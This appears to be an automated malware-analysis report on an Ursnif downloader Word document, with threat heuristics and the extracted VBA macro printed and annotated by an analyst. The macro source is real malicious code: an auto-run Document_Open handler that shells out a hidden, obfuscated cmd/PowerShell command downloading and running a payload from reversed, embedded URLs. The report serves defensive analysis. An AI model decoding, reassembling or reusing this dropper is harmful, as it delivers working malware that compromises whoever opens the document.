MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros with a Document_Open subroutine that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader. The reconstructed command string suggests a complex obfuscation technique for executing a payload.
Heuristics 5
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4615 bytes |

SHA-256: bebfff8e42df85e78fd9de54cf7df26b4f1d48cebb79bf1f881b5e46d0aff859
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ENBikDSwqAIpL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: the Attribute lines above are module metadata as exported by olevba.
' VB_Base = "1Normal.ThisDocument" identifies this as the document's ThisDocument
' class module, which is what allows the Document_open handler below to run
' automatically when the document is opened (once macros are enabled).
' Analyst note: auto-executing entry point of the maldoc. Because this lives in the
' ThisDocument module, Word invokes it on open with no further user interaction beyond
' enabling macros (MITRE T1204.002 / T1059.005 as listed in the report header).
Private Sub Document_open()
' "On Error Resume Next" written across four physical lines with "_" continuations.
' It swallows every runtime error, so none of the junk calls below can abort the macro.
On _
Error _
Resume _
Next
' Hour() is called with a concatenated text argument and the result is discarded; the
' resulting type-mismatch error is suppressed by the handler above. These lines appear
' to be no-op padding meant to dilute static signatures rather than do any work.
Hour "62117096" + "pkMLuXDwaiW" + "143630474" + "3818"
Hour "163357007" + "PHp"
Hour "dzCRhqpHXzYu" + "2443"
' The single effective statement: VBA.Shell runs the concatenation of CleanString(ZEV)
' (ZEV is not defined anywhere in this preview) and six further names. dKBzNls and
' SrFzurItYN are functions in the module below; the other four are presumably defined
' in modules outside the truncated preview — TODO confirm against the full dump.
' The window-style argument "47 - 47" evaluates to 0, i.e. vbHide, so the spawned
' process has no visible window. Detection: auto-exec handler + VBA.Shell + arithmetic
' constants is exactly the OLE_VBA_DOCOPEN / OLE_VBA_SHELL combination the report flags.
VBA.Shell CleanString(ZEV) + ABjdUJpVSQP + OwhfdDvvEnfYXv + dKBzNls + SrFzurItYN + QCCGvtlD + CWZFmiLkH, 47 - 47
' More discard-result padding after the Shell call; nothing below affects behaviour.
Hour "tbRvhwOEFwNLKC" + "205772364" + "NIz" + "LiTNAY"
Hour "OD" + "8368"
Hour "3531" + "2489"
Hour "AwNm" + "WNWbkLOzXzG"
End Sub
' Analyst note: start of a second module ("CnmwTZORWL") in the same olevba dump; the
' Attribute line marks a module boundary, not a new file. This module holds the
' string-builder functions that Document_open concatenates into its Shell argument.
Attribute VB_Name = "CnmwTZORWL"
' Analyst note: one of the string-builder functions whose return value is concatenated
' into the VBA.Shell argument in Document_open. It returns a fragment of a cmd.exe
' command line; the interleaved Hour calls are the same discard-result padding used in
' Document_open and can be ignored when reading the function.
Function dKBzNls()
' Same error suppression as in Document_open, so the junk Hour calls never abort it.
On _
Error _
Resume _
Next
Hour "z" + "8209"
Hour "7257" + "l" + "dBUBVu" + "cJP"
' Fragment 1 begins with "cmd /V/C": /V turns on delayed (!var!) expansion, which the
' batch logic in SrFzurItYN depends on. Chr(0 + 2 + 4 + 5 + 23) is Chr(34), a double
' quote spelled as arithmetic to avoid a literal. The many "^" characters are cmd.exe
' escape characters that the command parser drops, so they break static pattern matches
' without changing the executed text.
kBfURIbDuiv = "cmd /V/" + "C" + Chr(0 + 2 + 4 + 5 + 23) + "^s^e" + "^t" + " A^" + "m^h" + "z=^ " + " ^ ^ " + "^ ^"
Hour "5674" + "255742015" + "znHtIRL" + "49802393"
' Fragments 2-8 appear to be stored character-reversed (e.g. "hct^ac" with carets
' removed reads "catch" backwards) and are presumably put back in order at run time by
' the for /L loop visible in SrFzurItYN — TODO confirm in a sandbox. The decoded command
' is intentionally not reproduced in these notes.
HpPjbRv = " ^" + " ^ ^ " + " ^ ^ ^" + " }" + "}^{hct" + "^" + "ac^}^;" + "k" + "^a" + "er^b;^"
Hour "D" + "EUwPNvzOB" + "kS" + "vmwdKtrCiimzEK"
Hour "8188" + "SBzRE"
YKKjnO = "P" + "r" + "^" + "w$ m^et" + "I^-^e" + "k^o" + "vn^I^;)" + "Prw" + "^$" + "^" + " ^"
Hour "272497039" + "Lu"
Hour "422387696" + "NvTM" + "305024346" + "lrDo"
Hour "5017691" + "iMX"
Hour "9901" + "KRJl"
QowWqwGoot = ",^hXO^$" + "(^el" + "^i^F^" + "d^" + "a" + "^o^lnw^" + "oD^.^" + "YsX" + "^$^{yr"
Hour "HnBriNI" + "OZi"
AhGwdpwF = "t" + "^{)K^" + "X" + "^I$^ " + "n" + "^i^ ^" + "h" + "XO^" + "$(^hc^" + "a^ero" + "f;'" + "e"
Hour "rCTW" + "6080"
Hour "jJIz" + "O" + "519555364" + "jnFKqjfwm"
Hour "HCkPnEiRDHDljm" + "CbIAnKaoY" + "w" + "nddTcq"
XwGzuPjFYq = "^xe^.'" + "^+VE" + "i$" + "+^'\^" + "'+ci^l^" + "b" + "up:vne^" + "$^=^Prw" + "$;'^" + "18'^ =^" + " VE" + "i$^;)" + "'^@'"
Hour "6203182" + "KnjCYXK"
Hour "o" + "2459" + "uoh" + "952"
SYiUdH = "(t^" + "i^" + "lp" + "^" + "S.'^Q^" + "x^" + "x" + "OS^m/^" + "ssc" + "/n^im^" + "da-p"
Hour "PA" + "wXJdwZfq" + "sSdqDfhTwkzFHY" + "238251743"
Hour "qXv" + "401"
Hour "nauAmoA" + "mw"
Hour "jwBp" + "295698362"
vJcaqkjX = "^" + "w/^m" + "oc^.^g" + "n" + "ic" + "ru^o^" + "sc^i^" + "mar^" + "ecna^i" + "d" + "n^" + "i//:^pt"
' Return value: the eight fragments joined in declaration order. Splitting one string
' across eight variables and dozens of "+" literals is itself an evasion technique —
' no single literal contains a recognisable keyword for a scanner to match.
dKBzNls = kBfURIbDuiv + HpPjbRv + YKKjnO + QowWqwGoot + AhGwdpwF + XwGzuPjFYq + SYiUdH + vJcaqkjX
Hour "NURTN" + "5831" + "szIj" + "HULK"
End Function
Function SrFzurItYN()
On _
Error _
Resume _
Next
Hour "5714" + "207433000" + "3249" + "GZi"
GvdEGic = "t^h^" + "@VW/^" + "mo" + "c^.^s^" + "a^e^s^" + "-iiv"
Hour "4259" + "zYHPddBbbAQV"
Hour "TBGk" + "VKQQ"
zAzUUYv = "//^" + ":" + "pt" + "t^h^" + "@" + "^896/n" + "^i^x" + ".nafa//" + ":p" + "t" + "t^h^" + "@c"
Hour "ii" + "jTvoRuv"
Hour "713" + "uaOrmLhb" + "pJ" + "415967860"
RkFTd = "^w" + "^3l" + "^Pg1w/" + "moc.c" + "^mdt" + "c^a" + "^p^" + "moc//:p"
Hour "KRjj" + "9186"
ijlPJtWiN = "tt^h^" + "@^ZS^j" + "^FN" + "t6D/^e" + "ni^lno." + "^tr" + "^" + "h^" + "a^w^a^" + "d//" + "^:p^" + "tth"
Hour "7600" + "irdOMmnkzOha" + "6854" + "241909826"
Hour "hLilvHKwFq" + "G"
Hour "48559055" + "liaMkOEn"
Hour "KYs" + "Q"
JdojCutnYzR = "^'=" + "^KX" + "I" + "$;^tn" + "e^" + "ilCbe" + "^W^" + "." + "t^eN" + " tc"
Hour "zKiM" + "3389"
Hour "144153382" + "pjz"
zVqKaPSsH = "e^j^" + "bo-^" + "w" + "en^=" + "^Y^sX^" + "$^ ^l^l" + "e^"
Hour "8074" + "4181"
Hour "491376115" + "ipuThuCjzPL"
Hour "710" + "3983" + "BLVC" + "QHzfvdR"
Hour "sYfU" + "447767165" + "NzjMEmClW" + "VaMLIk"
qEwpLOsIv = "h^sr^e" + "w" + "op&&f^" + "or /" + "^L %^X " + "^in (3" + "6^6^," + "^-^1,^"
Hour "qli" + "9613"
RjzXKjO = "0)d^" + "o ^s^" + "et ^Ua" + "^Q=!^" + "Ua" + "^Q" + "!!A^m^h" + "z:~%" + "^" + "X,1!&&i" + "^f %^X " + "^l"
Hour "4542" + "kNWbCZCET" + "9873" + "DIkB"
Hour "4690" + "aDSokad" + "I" + "374218089"
Hour "6637" + "504305221"
Hour "1484" + "u" + "pJX" + "1000"
vBnCFNaR = "s^" + "s ^1" + " c^a^l^" + "l" + " %
... (truncated)